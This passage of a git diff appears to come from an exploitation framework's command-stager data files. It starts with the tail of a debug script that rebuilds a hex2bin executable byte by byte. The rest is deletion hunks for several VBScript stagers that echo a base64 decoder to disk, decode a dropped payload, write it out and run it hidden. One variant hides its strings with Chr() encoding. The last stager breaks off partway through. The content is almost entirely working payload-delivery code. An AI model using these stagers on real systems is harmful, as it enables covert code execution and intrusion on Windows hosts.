echo e 910 53 79 73 74 65 6d 2e 49 4f >>decoder_stub
echo e 91a 46 69 6c 65 >>decoder_stub
echo e 91f 52 65 61 64 41 6c 6c 54 65 78 74 >>decoder_stub
echo e 92b 53 74 72 69 6e 67 >>decoder_stub
echo e 932 52 65 70 6c 61 63 65 >>decoder_stub
echo e 93a 67 65 74 5f 4c 65 6e 67 74 68 >>decoder_stub
echo e 945 42 79 74 65 >>decoder_stub
echo e 94a 53 75 62 73 74 72 69 6e 67 >>decoder_stub
echo e 954 43 6f 6e 76 65 72 74 >>decoder_stub
echo e 95c 54 6f 42 79 74 65 >>decoder_stub
echo e 963 43 6f 6e 63 61 74 >>decoder_stub
echo e 96a 46 69 6c 65 53 74 72 65 61 6d >>decoder_stub
echo e 975 43 72 65 61 74 65 >>decoder_stub
echo e 97c 53 74 72 65 61 6d >>decoder_stub
echo e 983 57 72 69 74 65 >>decoder_stub
echo e 989 43 6c 6f 73 65 >>decoder_stub
echo e 991 49 55 >>decoder_stub
echo e 994 73 >>decoder_stub
echo e 996 61 >>decoder_stub
echo e 998 67 >>decoder_stub
echo e 99a 65 >>decoder_stub
echo e 99c 3a >>decoder_stub
echo e 99e 20 >>decoder_stub
echo e 9a0 20 >>decoder_stub
echo e 9a2 20 >>decoder_stub
echo e 9a4 68 >>decoder_stub
echo e 9a6 65 >>decoder_stub
echo e 9a8 78 >>decoder_stub
echo e 9aa 32 >>decoder_stub
echo e 9ac 62 >>decoder_stub
echo e 9ae 69 >>decoder_stub
echo e 9b0 6e >>decoder_stub
echo e 9b2 2e >>decoder_stub
echo e 9b4 65 >>decoder_stub
echo e 9b6 78 >>decoder_stub
echo e 9b8 65 >>decoder_stub
echo e 9ba 20 >>decoder_stub
echo e 9bc 3c >>decoder_stub
echo e 9be 68 >>decoder_stub
echo e 9c0 65 >>decoder_stub
echo e 9c2 78 >>decoder_stub
echo e 9c4 69 >>decoder_stub
echo e 9c6 6e >>decoder_stub
echo e 9c8 70 >>decoder_stub
echo e 9ca 75 >>decoder_stub
echo e 9cc 74 >>decoder_stub
echo e 9ce 66 >>decoder_stub
echo e 9d0 69 >>decoder_stub
echo e 9d2 6c >>decoder_stub
echo e 9d4 65 >>decoder_stub
echo e 9d6 3e >>decoder_stub
echo e 9d8 08 >>decoder_stub
echo e 9da 01 03 0d >>decoder_stub
echo e 9df 01 >>decoder_stub
echo e 9e1 03 0a >>decoder_stub
echo e 9e5 09 2e >>decoder_stub
echo e 9e8 65 >>decoder_stub
echo e 9ea 78 >>decoder_stub
echo e 9ec 65 >>decoder_stub
echo e 9f0 06 24 bb c2 bc b7 11 40 bf c4 9c a7 d7 ed 8c f2 >>decoder_stub
echo e a01 08 b7 7a 5c 56 19 34 e0 89 05 >>decoder_stub
echo e a0c 01 01 1d 0e 03 20 >>decoder_stub
echo e a13 01 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 3d 04 20 01 >>decoder_stub
echo e a27 01 08 04 >>decoder_stub
echo e a2b 01 01 0e 04 >>decoder_stub
echo e a30 01 0e 0e 05 20 02 0e 0e 0e 03 20 >>decoder_stub
echo e a3c 08 05 20 02 0e 08 08 05 >>decoder_stub
echo e a45 02 05 0e 08 05 >>decoder_stub
echo e a4b 02 0e 0e 0e 05 >>decoder_stub
echo e a51 01 12 5d 0e 07 20 03 01 1d 05 08 08 0b 07 07 0e 1d 05 08 0e >>decoder_stub
echo e a65 08 12 5d 02 0c 01 >>decoder_stub
echo e a6c 07 68 65 78 32 62 69 6e >>decoder_stub
echo e a76 05 01 >>decoder_stub
echo e a7c 17 01 >>decoder_stub
echo e a7f 12 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 20 32 30 30 38 >>decoder_stub
echo e a94 29 01 >>decoder_stub
echo e a97 24 66 39 39 39 62 62 62 31 2d 66 31 30 61 2d 34 39 65 38 2d >>decoder_stub
echo e aab 38 33 35 37 2d 30 35 39 61 30 63 65 37 37 31 36 38 >>decoder_stub
echo e abe 0c 01 >>decoder_stub
echo e ac1 07 31 2e 30 2e 30 2e 30 >>decoder_stub
echo e acb 08 01 >>decoder_stub
echo e ace 07 01 >>decoder_stub
echo e ad4 08 01 >>decoder_stub
echo e ad7 08 >>decoder_stub
echo e add 1e 01 >>decoder_stub
echo e ae0 01 >>decoder_stub
echo e ae2 54 02 16 57 72 61 70 4e 6f 6e 45 78 63 65 70 74 69 6f 6e 54 >>decoder_stub
echo e af6 68 72 6f 77 73 01 >>decoder_stub
echo e b00 85 18 7c 48 >>decoder_stub
echo e b08 02 >>decoder_stub
echo e b0c 53 >>decoder_stub
echo e b10 18 28 >>decoder_stub
echo e b14 18 0a >>decoder_stub
echo e b18 52 53 44 53 e8 fc 2e 9d aa 52 59 42 a5 63 1e b1 c8 f6 59 23 >>decoder_stub
echo e b2c 03 >>decoder_stub
echo e b30 53 3a 5c 73 74 75 66 66 5c 70 72 6f 67 72 61 6d 6d 69 6e 67 >>decoder_stub
echo e b44 5c 68 65 78 32 62 69 6e 5c 68 65 78 32 62 69 6e 5c 6f 62 6a >>decoder_stub
echo e b58 5c 44 65 62 75 67 5c 68 65 78 32 62 69 6e 2e 70 64 62 >>decoder_stub
echo e b6c 94 28 >>decoder_stub
echo e b78 ae 28 >>decoder_stub
echo e b7d 20 >>decoder_stub
echo e b94 a0 28 >>decoder_stub
echo e ba2 5f 43 6f 72 45 78 65 4d 61 69 6e >>decoder_stub
echo e bae 6d 73 63 6f 72 65 65 2e 64 6c 6c >>decoder_stub
echo e bbe ff 25 >>decoder_stub
echo e bc1 20 40 >>decoder_stub
echo e d0e 02 >>decoder_stub
echo e d10 10 >>decoder_stub
echo e d14 20 >>decoder_stub
echo e d17 80 18 >>decoder_stub
echo e d1c 38 >>decoder_stub
echo e d1f 80 >>decoder_stub
echo e d2e 01 >>decoder_stub
echo e d30 01 >>decoder_stub
echo e d34 50 >>decoder_stub
echo e d37 80 >>decoder_stub
echo e d46 01 >>decoder_stub
echo e d48 01 >>decoder_stub
echo e d4c 68 >>decoder_stub
echo e d4f 80 >>decoder_stub
echo e d5e 01 >>decoder_stub
echo e d64 80 >>decoder_stub
echo e d76 01 >>decoder_stub
echo e d7c 90 >>decoder_stub
echo e d80 a0 40 >>decoder_stub
echo e d84 a0 02 >>decoder_stub
echo e d90 40 43 >>decoder_stub
echo e d94 ea 01 >>decoder_stub
echo e da0 a0 02 34 >>decoder_stub
echo e da6 56 >>decoder_stub
echo e da8 53 >>decoder_stub
echo e daa 5f >>decoder_stub
echo e dac 56 >>decoder_stub
echo e dae 45 >>decoder_stub
echo e db0 52 >>decoder_stub
echo e db2 53 >>decoder_stub
echo e db4 49 >>decoder_stub
echo e db6 4f >>decoder_stub
echo e db8 4e >>decoder_stub
echo e dba 5f >>decoder_stub
echo e dbc 49 >>decoder_stub
echo e dbe 4e >>decoder_stub
echo e dc0 46 >>decoder_stub
echo e dc2 4f >>decoder_stub
echo e dc8 bd 04 ef fe >>decoder_stub
echo e dce 01 >>decoder_stub
echo e dd2 01 >>decoder_stub
echo e dda 01 >>decoder_stub
echo e de0 3f >>decoder_stub
echo e de8 04 >>decoder_stub
echo e dec 01 >>decoder_stub
echo e dfc 44 >>decoder_stub
echo e e00 01 >>decoder_stub
echo e e02 56 >>decoder_stub
echo e e04 61 >>decoder_stub
echo e e06 72 >>decoder_stub
echo e e08 46 >>decoder_stub
echo e e0a 69 >>decoder_stub
echo e e0c 6c >>decoder_stub
echo e e0e 65 >>decoder_stub
echo e e10 49 >>decoder_stub
echo e e12 6e >>decoder_stub
echo e e14 66 >>decoder_stub
echo e e16 6f >>decoder_stub
echo e e1c 24 >>decoder_stub
echo e e1e 04 >>decoder_stub
echo e e22 54 >>decoder_stub
echo e e24 72 >>decoder_stub
echo e e26 61 >>decoder_stub
echo e e28 6e >>decoder_stub
echo e e2a 73 >>decoder_stub
echo e e2c 6c >>decoder_stub
echo e e2e 61 >>decoder_stub
echo e e30 74 >>decoder_stub
echo e e32 69 >>decoder_stub
echo e e34 6f >>decoder_stub
echo e e36 6e >>decoder_stub
echo e e3e b0 04 >>decoder_stub
echo e e41 02 >>decoder_stub
echo e e44 01 >>decoder_stub
echo e e46 53 >>decoder_stub
echo e e48 74 >>decoder_stub
echo e e4a 72 >>decoder_stub
echo e e4c 69 >>decoder_stub
echo e e4e 6e >>decoder_stub
echo e e50 67 >>decoder_stub
echo e e52 46 >>decoder_stub
echo e e54 69 >>decoder_stub
echo e e56 6c >>decoder_stub
echo e e58 65 >>decoder_stub
echo e e5a 49 >>decoder_stub
echo e e5c 6e >>decoder_stub
echo e e5e 66 >>decoder_stub
echo e e60 6f >>decoder_stub
echo e e64 dc 01 >>decoder_stub
echo e e68 01 >>decoder_stub
echo e e6a 30 >>decoder_stub
echo e e6c 30 >>decoder_stub
echo e e6e 30 >>decoder_stub
echo e e70 30 >>decoder_stub
echo e e72 30 >>decoder_stub
echo e e74 34 >>decoder_stub
echo e e76 62 >>decoder_stub
echo e e78 30 >>decoder_stub
echo e e7c 38 >>decoder_stub
echo e e7e 08 >>decoder_stub
echo e e80 01 >>decoder_stub
echo e e82 46 >>decoder_stub
echo e e84 69 >>decoder_stub
echo e e86 6c >>decoder_stub
echo e e88 65 >>decoder_stub
echo e e8a 44 >>decoder_stub
echo e e8c 65 >>decoder_stub
echo e e8e 73 >>decoder_stub
echo e e90 63 >>decoder_stub
echo e e92 72 >>decoder_stub
echo e e94 69 >>decoder_stub
echo e e96 70 >>decoder_stub
echo e e98 74 >>decoder_stub
echo e e9a 69 >>decoder_stub
echo e e9c 6f >>decoder_stub
echo e e9e 6e >>decoder_stub
echo e ea4 68 >>decoder_stub
echo e ea6 65 >>decoder_stub
echo e ea8 78 >>decoder_stub
echo e eaa 32 >>decoder_stub
echo e eac 62 >>decoder_stub
echo e eae 69 >>decoder_stub
echo e eb0 6e >>decoder_stub
echo e eb4 30 >>decoder_stub
echo e eb6 08 >>decoder_stub
echo e eb8 01 >>decoder_stub
echo e eba 46 >>decoder_stub
echo e ebc 69 >>decoder_stub
echo e ebe 6c >>decoder_stub
echo e ec0 65 >>decoder_stub
echo e ec2 56 >>decoder_stub
echo e ec4 65 >>decoder_stub
echo e ec6 72 >>decoder_stub
echo e ec8 73 >>decoder_stub
echo e eca 69 >>decoder_stub
echo e ecc 6f >>decoder_stub
echo e ece 6e >>decoder_stub
echo e ed4 31 >>decoder_stub
echo e ed6 2e >>decoder_stub
echo e ed8 30 >>decoder_stub
echo e eda 2e >>decoder_stub
echo e edc 30 >>decoder_stub
echo e ede 2e >>decoder_stub
echo e ee0 30 >>decoder_stub
echo e ee4 38 >>decoder_stub
echo e ee6 0c >>decoder_stub
echo e ee8 01 >>decoder_stub
echo e eea 49 >>decoder_stub
echo e eec 6e >>decoder_stub
echo e eee 74 >>decoder_stub
echo e ef0 65 >>decoder_stub
echo e ef2 72 >>decoder_stub
echo e ef4 6e >>decoder_stub
echo e ef6 61 >>decoder_stub
echo e ef8 6c >>decoder_stub
echo e efa 4e >>decoder_stub
echo e efc 61 >>decoder_stub
echo e efe 6d >>decoder_stub
echo e f00 65 >>decoder_stub
echo e f04 68 >>decoder_stub
echo e f06 65 >>decoder_stub
echo e f08 78 >>decoder_stub
echo e f0a 32 >>decoder_stub
echo e f0c 62 >>decoder_stub
echo e f0e 69 >>decoder_stub
echo e f10 6e >>decoder_stub
echo e f12 2e >>decoder_stub
echo e f14 65 >>decoder_stub
echo e f16 78 >>decoder_stub
echo e f18 65 >>decoder_stub
echo e f1c 48 >>decoder_stub
echo e f1e 12 >>decoder_stub
echo e f20 01 >>decoder_stub
echo e f22 4c >>decoder_stub
echo e f24 65 >>decoder_stub
echo e f26 67 >>decoder_stub
echo e f28 61 >>decoder_stub
echo e f2a 6c >>decoder_stub
echo e f2c 43 >>decoder_stub
echo e f2e 6f >>decoder_stub
echo e f30 70 >>decoder_stub
echo e f32 79 >>decoder_stub
echo e f34 72 >>decoder_stub
echo e f36 69 >>decoder_stub
echo e f38 67 >>decoder_stub
echo e f3a 68 >>decoder_stub
echo e f3c 74 >>decoder_stub
echo e f40 43 >>decoder_stub
echo e f42 6f >>decoder_stub
echo e f44 70 >>decoder_stub
echo e f46 79 >>decoder_stub
echo e f48 72 >>decoder_stub
echo e f4a 69 >>decoder_stub
echo e f4c 67 >>decoder_stub
echo e f4e 68 >>decoder_stub
echo e f50 74 >>decoder_stub
echo e f52 20 >>decoder_stub
echo e f54 a9 >>decoder_stub
echo e f56 20 >>decoder_stub
echo e f58 20 >>decoder_stub
echo e f5a 32 >>decoder_stub
echo e f5c 30 >>decoder_stub
echo e f5e 30 >>decoder_stub
echo e f60 38 >>decoder_stub
echo e f64 40 >>decoder_stub
echo e f66 0c >>decoder_stub
echo e f68 01 >>decoder_stub
echo e f6a 4f >>decoder_stub
echo e f6c 72 >>decoder_stub
echo e f6e 69 >>decoder_stub
echo e f70 67 >>decoder_stub
echo e f72 69 >>decoder_stub
echo e f74 6e >>decoder_stub
echo e f76 61 >>decoder_stub
echo e f78 6c >>decoder_stub
echo e f7a 46 >>decoder_stub
echo e f7c 69 >>decoder_stub
echo e f7e 6c >>decoder_stub
echo e f80 65 >>decoder_stub
echo e f82 6e >>decoder_stub
echo e f84 61 >>decoder_stub
echo e f86 6d >>decoder_stub
echo e f88 65 >>decoder_stub
echo e f8c 68 >>decoder_stub
echo e f8e 65 >>decoder_stub
echo e f90 78 >>decoder_stub
echo e f92 32 >>decoder_stub
echo e f94 62 >>decoder_stub
echo e f96 69 >>decoder_stub
echo e f98 6e >>decoder_stub
echo e f9a 2e >>decoder_stub
echo e f9c 65 >>decoder_stub
echo e f9e 78 >>decoder_stub
echo e fa0 65 >>decoder_stub
echo e fa4 30 >>decoder_stub
echo e fa6 08 >>decoder_stub
echo e fa8 01 >>decoder_stub
echo e faa 50 >>decoder_stub
echo e fac 72 >>decoder_stub
echo e fae 6f >>decoder_stub
echo e fb0 64 >>decoder_stub
echo e fb2 75 >>decoder_stub
echo e fb4 63 >>decoder_stub
echo e fb6 74 >>decoder_stub
echo e fb8 4e >>decoder_stub
echo e fba 61 >>decoder_stub
echo e fbc 6d >>decoder_stub
echo e fbe 65 >>decoder_stub
echo e fc4 68 >>decoder_stub
echo e fc6 65 >>decoder_stub
echo e fc8 78 >>decoder_stub
echo e fca 32 >>decoder_stub
echo e fcc 62 >>decoder_stub
echo e fce 69 >>decoder_stub
echo e fd0 6e >>decoder_stub
echo e fd4 34 >>decoder_stub
echo e fd6 08 >>decoder_stub
echo e fd8 01 >>decoder_stub
echo e fda 50 >>decoder_stub
echo e fdc 72 >>decoder_stub
echo e fde 6f >>decoder_stub
echo e fe0 64 >>decoder_stub
echo e fe2 75 >>decoder_stub
echo e fe4 63 >>decoder_stub
echo e fe6 74 >>decoder_stub
echo e fe8 56 >>decoder_stub
echo e fea 65 >>decoder_stub
echo e fec 72 >>decoder_stub
echo e fee 73 >>decoder_stub
echo e ff0 69 >>decoder_stub
echo e ff2 6f >>decoder_stub
echo e ff4 6e >>decoder_stub
echo e ff8 31 >>decoder_stub
echo e ffa 2e >>decoder_stub
echo e ffc 30 >>decoder_stub
echo e ffe 2e >>decoder_stub
echo e 1000 30 >>decoder_stub
echo e 1002 2e >>decoder_stub
echo e 1004 30 >>decoder_stub
echo e 1008 38 >>decoder_stub
echo e 100a 08 >>decoder_stub
echo e 100c 01 >>decoder_stub
echo e 100e 41 >>decoder_stub
echo e 1010 73 >>decoder_stub
echo e 1012 73 >>decoder_stub
echo e 1014 65 >>decoder_stub
echo e 1016 6d >>decoder_stub
echo e 1018 62 >>decoder_stub
echo e 101a 6c >>decoder_stub
echo e 101c 79 >>decoder_stub
echo e 101e 20 >>decoder_stub
echo e 1020 56 >>decoder_stub
echo e 1022 65 >>decoder_stub
echo e 1024 72 >>decoder_stub
echo e 1026 73 >>decoder_stub
echo e 1028 69 >>decoder_stub
echo e 102a 6f >>decoder_stub
echo e 102c 6e >>decoder_stub
echo e 1030 31 >>decoder_stub
echo e 1032 2e >>decoder_stub
echo e 1034 30 >>decoder_stub
echo e 1036 2e >>decoder_stub
echo e 1038 30 >>decoder_stub
echo e 103a 2e >>decoder_stub
echo e 103c 30 >>decoder_stub
echo e 1040 ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e >>decoder_stub
echo e 1054 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 >>decoder_stub
echo e 1068 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a >>decoder_stub
echo e 107c 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e >>decoder_stub
echo e 1090 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 >>decoder_stub
echo e 10a4 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 >>decoder_stub
echo e 10b8 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 20 20 3c 61 73 >>decoder_stub
echo e 10cc 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 76 65 72 73 69 >>decoder_stub
echo e 10e0 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 20 6e 61 6d 65 3d 22 4d >>decoder_stub
echo e 10f4 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 61 70 70 22 2f 3e 0d >>decoder_stub
echo e 1108 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d >>decoder_stub
echo e 111c 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f >>decoder_stub
echo e 1130 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 3e 0d 0a 20 20 20 >>decoder_stub
echo e 1144 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c >>decoder_stub
echo e 1158 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 20 >>decoder_stub
echo e 116c 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d >>decoder_stub
echo e 1180 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 >>decoder_stub
echo e 1194 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 >>decoder_stub
echo e 11a8 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 6c 65 76 65 >>decoder_stub
echo e 11bc 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 >>decoder_stub
echo e 11d0 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 >>decoder_stub
echo e 11e4 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 >>decoder_stub
echo e 11f8 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d >>decoder_stub
echo e 120c 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 >>decoder_stub
echo e 1220 73 73 65 6d 62 6c 79 3e 0d 0a >>decoder_stub
echo e 1301 20 >>decoder_stub
echo e 1304 0c >>decoder_stub
echo e 1308 c0 38 >>decoder_stub
echo w >>decoder_stub
echo q >>decoder_stub

40
data/exploits/cmdstager/vbs_b64
View File

@ -1,40 +0,0 @@
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
echo Set file = fs.GetFile("ENCODED") >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, vbCrLf, "") >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
echo ofs.Write data >>decode_stub
echo ofs.close >>decode_stub
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
echo shell.run "DECODED", 0, false >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo "The file is empty." >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

50
data/exploits/cmdstager/vbs_b64_adodb
View File

@ -1,50 +0,0 @@
echo Dim var_origLoc >>decode_stub
echo var_origLoc = SetLocale(1033) >>decode_stub
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
echo Set file = fs.GetFile("ENCODED") >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, vbCrLf, "") >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
echo var_writedir = "DECODED" >>decode_stub
echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
echo var_strmConv.Type = 2 >>decode_stub
echo var_strmConv.Charset = "x-ansi" >>decode_stub
echo var_strmConv.Open >>decode_stub
echo var_strmConv.WriteText data, 0 >>decode_stub
echo var_strmConv.Position = 0 >>decode_stub
echo var_strmConv.Type = 1 >>decode_stub
echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
echo SetLocale(var_origLoc) >>decode_stub
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
echo shell.run "DECODED", 0, false >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo "The file is empty." >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

49
data/exploits/cmdstager/vbs_b64_noquot
View File

@ -1,49 +0,0 @@
echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
echo tempString = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
echo Set wshShell = CreateObject(scriptShell) >>decode_stub
echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
echo Set fs = CreateObject(scriptingFS) >>decode_stub
echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
echo data = Replace(data, vbCrLf, nil) >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
echo ofs.Write data >>decode_stub
echo ofs.close >>decode_stub
echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo emptyString >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

41
data/exploits/cmdstager/vbs_b64_sleep
View File

@ -1,41 +0,0 @@
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
echo Set file = fs.GetFile("ENCODED") >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, vbCrLf, "") >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
echo ofs.Write data >>decode_stub
echo ofs.close >>decode_stub
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
echo shell.run "DECODED", 0, false >>decode_stub
echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo "The file is empty." >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
